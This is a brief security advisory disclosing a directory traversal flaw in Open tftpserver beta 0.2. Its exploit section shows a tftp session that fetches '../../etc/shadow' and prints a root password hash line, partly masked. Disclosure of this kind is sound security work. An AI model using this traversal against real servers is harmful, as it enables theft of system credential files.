VDB-ID: 46 Title: Open tftpserver dot dot vulnerability Vulnerability Date: 2006-03-24 Download: http://sourceforge.net/projects/tftp-server/ Vendor: achaldhir Notified: 2006-03-24 Vendor Contact: http://sourceforge.net/u/achaldhir/profile/ Description: MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available. Vulnerability: tftpserver beta 0.2 is vulnerable to the ../ bug because it does not sanitize user input. CVE-IDs: Exploit: root@pangea:/home/done/tftpserver# tftp 192.168.0.26 tftp> get ../../etc/shadow Received 652 bytes in 0.0 seconds tftp> quit root@debian:/home/done/tftpserver# head shadow root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7::: URL: http://www.vapid.dhs.org/advisories/tftpserver_dot_dot_vulnerability.html Credit: Larry W. Cashdollar, @_larry0